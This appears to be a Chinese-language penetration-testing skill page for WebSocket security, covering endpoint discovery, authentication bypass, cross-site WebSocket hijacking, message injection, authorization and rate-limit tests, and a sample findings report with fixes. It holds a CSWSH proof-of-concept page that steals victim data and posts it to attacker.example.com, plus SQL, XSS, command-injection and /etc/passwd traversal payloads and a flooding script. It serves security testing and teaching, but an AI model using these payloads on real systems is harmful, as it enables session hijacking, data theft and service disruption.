Tests WebSocket implementations for authentication bypass, cross-site hijacking (CSWSH), injection attacks, and insecure message handling during authorized penetration tests. Useful for real-time apps like chat, notifications, or collaborative tools.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
- 在授权渗透测试中,当应用程序使用 WebSocket 连接实现实时功能时
Tests WebSocket implementations for authentication bypass, cross-site hijacking, injection attacks, and insecure message handling during authorized pentests.
Tests WebSocket endpoints for auth bypass, cross-site hijacking, injections, and insecure message handling in authorized pentests using Burp Suite, websocat, and scripting.
Tests WebSocket API security: missing auth on upgrade, CSWSH, message injections, input validation failures, DoS flooding, frame leaks. Uses Burp Suite and Python scripts for pentesting real-time APIs.
Share bugs, ideas, or general feedback.
cargo install websocat)npm install -g wscat)pip install websockets)识别应用程序中的 WebSocket 连接。
# 检查响应头中的 WebSocket 升级
curl -s -I \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
"https://target.example.com/ws"
# 常见 WebSocket 端点路径
for path in /ws /websocket /socket /socket.io /signalr /hub \
/chat /notifications /live /stream /realtime /api/ws; do
echo -n "$path: "
status=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
"https://target.example.com$path")
echo "$status"
done
# 检查 Socket.IO
curl -s "https://target.example.com/socket.io/?EIO=4&transport=polling"
# 检查 SignalR
curl -s "https://target.example.com/signalr/negotiate"
# 在浏览器 DevTools 中:
# 网络标签 > 过滤:WS
# 查找 ws:// 或 wss:// 连接
# 检查升级请求和 WebSocket 帧
验证 WebSocket 连接是否需要正确的身份验证。
# 测试无需认证的连接
wscat -c "wss://target.example.com/ws"
# 如果无令牌即可连接,说明缺少认证
# 使用过期/无效令牌进行测试
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=invalid_or_expired_token"
# 使用被盗/重放的会话进行测试
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=valid_session_from_another_user"
# 测试 WebSocket URL 参数中的令牌
wscat -c "wss://target.example.com/ws?token=invalid_token"
# 测试认证是否仅在连接时检查
# 使用有效令牌连接,然后检查令牌过期或用户登出后消息是否仍然有效
# 使用 Python 进行自动化测试
python3 << 'PYEOF'
import asyncio
import websockets
async def test_no_auth():
try:
async with websockets.connect("wss://target.example.com/ws") as ws:
print("无需认证即可连接!")
# 尝试发送消息
await ws.send('{"type":"get_data","resource":"users"}')
response = await ws.recv()
print(f"响应:{response}")
except Exception as e:
print(f"连接失败:{e}")
asyncio.run(test_no_auth())
PYEOF
检查 WebSocket 握手是否容易受到跨站攻击。
# 检查 WebSocket 升级时的 Origin 头验证
curl -s -I \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
-H "Origin: https://evil.example.com" \
"https://target.example.com/ws"
# 如果返回 101 Switching Protocols:未验证 Origin(存在 CSWSH 风险)
# 如果返回 403:Origin 验证正常工作
<!-- 跨站 WebSocket 劫持(CSWSH)PoC -->
<!-- 托管在攻击者控制的服务器上 -->
<html>
<head><title>CSWSH PoC</title></head>
<body>
<h1>跨站 WebSocket 劫持</h1>
<div id="messages"></div>
<script>
// 使用受害者的 Cookie 连接到目标 WebSocket
var ws = new WebSocket("wss://target.example.com/ws");
ws.onopen = function() {
console.log("WebSocket 已连接(使用受害者的会话)");
// 通过 WebSocket 请求敏感数据
ws.send(JSON.stringify({type: "get_messages", channel: "private"}));
ws.send(JSON.stringify({type: "get_profile"}));
};
ws.onmessage = function(event) {
console.log("数据已窃取:" + event.data);
document.getElementById("messages").innerText += event.data + "\n";
// 外泄到攻击者服务器
fetch("https://attacker.example.com/collect", {
method: "POST",
body: event.data
});
};
ws.onerror = function(error) {
console.log("WebSocket 错误:" + error);
};
</script>
</body>
</html>
评估 WebSocket 消息中的注入漏洞。
# 使用 wscat 进行手动消息注入测试
wscat -c "wss://target.example.com/ws" \
-H "Cookie: session=valid_session_token"
# 连接后,发送测试消息:
# WebSocket 消息中的 SQL 注入
# > {"action":"search","query":"' OR 1=1--"}
# 聊天消息中的 XSS 载荷
# > {"type":"message","content":"<script>alert(document.cookie)</script>"}
# > {"type":"message","content":"<img src=x onerror=alert(1)>"}
# 命令注入
# > {"action":"ping","host":"127.0.0.1; whoami"}
# 路径遍历
# > {"action":"read_file","path":"../../../etc/passwd"}
# WebSocket 消息中的 IDOR
# > {"action":"get_messages","channel_id":1}
# > {"action":"get_messages","channel_id":2}(其他用户的频道)
# Python 自动化注入测试
python3 << 'PYEOF'
import asyncio
import websockets
import json
PAYLOADS = [
{"action": "search", "query": "' OR 1=1--"},
{"action": "search", "query": "<script>alert(1)</script>"},
{"action": "search", "query": "{{7*7}}"},
{"action": "search", "query": "${7*7}"},
{"action": "read", "file": "../../../etc/passwd"},
{"action": "exec", "cmd": "; whoami"},
]
async def test_injections():
async with websockets.connect(
"wss://target.example.com/ws",
extra_headers={"Cookie": "session=valid_token"}
) as ws:
for payload in PAYLOADS:
await ws.send(json.dumps(payload))
try:
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"载荷:{json.dumps(payload)}")
print(f"响应:{response}\n")
except asyncio.TimeoutError:
print(f"超时:{json.dumps(payload)}\n")
asyncio.run(test_injections())
PYEOF
检查是否强制执行消息级授权和滥用控制。
# 测试通过 WebSocket 访问其他用户的数据
python3 << 'PYEOF'
import asyncio
import websockets
import json
async def test_authz():
async with websockets.connect(
"wss://target.example.com/ws",
extra_headers={"Cookie": "session=user_a_session"}
) as ws:
# 尝试访问用户 B 的私人数据
messages = [
{"type": "subscribe", "channel": "user_b_private"},
{"type": "get_history", "user_id": "user_b_id"},
{"type": "admin_action", "action": "list_users"},
{"type": "send_message", "to": "admin", "as": "admin"},
]
for msg in messages:
await ws.send(json.dumps(msg))
try:
response = await asyncio.wait_for(ws.recv(), timeout=5)
print(f"发送:{json.dumps(msg)}")
print(f"收到:{response}\n")
except asyncio.TimeoutError:
print(f"无响应:{json.dumps(msg)}\n")
asyncio.run(test_authz())
PYEOF
# 测试 WebSocket 消息的速率限制
python3 << 'PYEOF'
import asyncio
import websockets
import json
import time
async def test_rate_limit():
async with websockets.connect(
"wss://target.example.com/ws",
extra_headers={"Cookie": "session=valid_token"}
) as ws:
start = time.time()
for i in range(1000):
await ws.send(json.dumps({
"type": "message",
"content": f"洪水消息 {i}"
}))
elapsed = time.time() - start
print(f"在 {elapsed:.2f} 秒内发送了 1000 条消息")
print("如果没有速率限制,可能导致 DoS")
asyncio.run(test_rate_limit())
PYEOF
验证传输安全和协议级别的保护。
# 检查 WebSocket 使用 WSS(加密)还是 WS(明文)
# WS (ws://) 流量可被网络攻击者拦截
# 检查混合协议
# 应用程序在 HTTPS 上但 WebSocket 在 WS 上 = 不安全
curl -s "https://target.example.com/" | grep -oP "ws://[^\"']+"
# 应该只找到 wss://(加密 WebSocket)
# 测试 Sec-WebSocket-Protocol 头处理
wscat -c "wss://target.example.com/ws" \
-H "Sec-WebSocket-Protocol: admin-protocol"
# 测试压缩侧信道(类似 CRIME 的攻击)
# 检查 Sec-WebSocket-Extensions 是否包含 permessage-deflate
curl -s -I \
-H "Upgrade: websocket" \
-H "Connection: Upgrade" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Extensions: permessage-deflate" \
"https://target.example.com/ws" | grep -i "sec-websocket-extensions"
# 带机密信息的 permessage-deflate 可能通过压缩泄露数据
# 测试 WebSocket 连接持久性
# 检查服务器是否实施了适当的超时和连接限制
| 概念 | 定义 |
|---|---|
| WebSocket 握手 | 将连接从 HTTP 升级到 WebSocket 协议的 HTTP 升级请求 |
| CSWSH | 跨站 WebSocket 劫持(Cross-Site WebSocket Hijacking)——利用缺失的 Origin 验证劫持会话 |
| Origin 验证(Origin Validation) | 服务器端检查,确认 WebSocket 升级请求来自可信来源 |
| 消息级授权(Message-level Authorization) | 验证每条 WebSocket 消息的权限,而非仅在连接时验证 |
| WSS | 安全 WebSocket(WebSocket Secure)——通过 TLS 加密的 WebSocket 连接(相当于 HTTPS) |
| Socket.IO | 流行的 WebSocket 库,自动回退到 HTTP 长轮询 |
| Ping/Pong 帧 | WebSocket 心跳机制,可被滥用于时序攻击 |
| 工具 | 用途 |
|---|---|
| Burp Suite Professional | WebSocket 拦截、修改和历史分析 |
| wscat | 用于手动测试的命令行 WebSocket 客户端 |
| websocat | 用 Rust 编写的多功能命令行 WebSocket 客户端 |
| 浏览器 DevTools | 用于检查 WebSocket 帧的网络标签 WS 过滤器 |
| Socket.IO Client | 测试基于 Socket.IO 的 WebSocket 实现 |
| Python websockets | 编写自动化 WebSocket 攻击序列脚本 |
实时聊天应用程序在 WebSocket 握手期间验证用户的 Cookie,但不检查 Origin 头。攻击者托管一个页面,打开到聊天服务器的 WebSocket,窃取受害者的私人消息。
交易平台处理包含订单参数的 WebSocket 消息。订单消息 symbol 字段中的 SQL 注入允许通过基于错误的 SQLi 提取整个订单数据库。
协作工具在 WebSocket 连接时检查用户身份验证,但不验证单个消息的授权。连接后,普通用户发送管理员级别的命令来删除工作区和导出用户数据。
通知系统通过包含频道 ID 的 WebSocket 消息将用户订阅到频道。更改频道 ID 允许任何用户订阅其他用户的私人通知频道。
## WebSocket 安全评估报告
**漏洞**:跨站 WebSocket 劫持(CSWSH)
**严重性**:高(CVSS 8.1)
**位置**:wss://target.example.com/ws
**OWASP 类别**:A01:2021 - 访问控制失效
### WebSocket 配置
| 属性 | 值 |
|----------|-------|
| 协议 | WSS(加密) |
| 库 | Socket.IO 4.x |
| 认证 | 基于 Cookie 的会话 |
| Origin 验证 | 未强制执行 |
| 消息授权 | 未强制执行 |
| 速率限制 | 未实现 |
### 发现
| 发现 | 严重性 |
|---------|----------|
| CSWSH — 无 Origin 验证 | 高 |
| 缺少消息级授权 | 高 |
| 通过聊天消息注入的 XSS | 中 |
| 消息无速率限制 | 中 |
| 频道 IDOR(可订阅任意频道) | 高 |
| 登出后 WebSocket 仍保持开放 | 中 |
### 影响
- 通过 CSWSH 泄露私人消息
- 通过未授权消息发送实现账户冒充
- 影响所有用户的跨频道数据访问
- 通过消息洪泛实现 DoS(无速率限制)
### 修复建议
1. 在 WebSocket 握手期间验证 Origin 头
2. 在 WebSocket 升级请求中实现 CSRF 令牌
3. 对每条 WebSocket 消息强制执行授权检查
4. 清理 WebSocket 消息中的所有用户输入(防止 XSS/SQLi)
5. 按连接实施消息速率限制
6. 在登出或会话过期时使 WebSocket 连接失效
7. 使用每条消息的认证令牌,而非仅依赖初始握手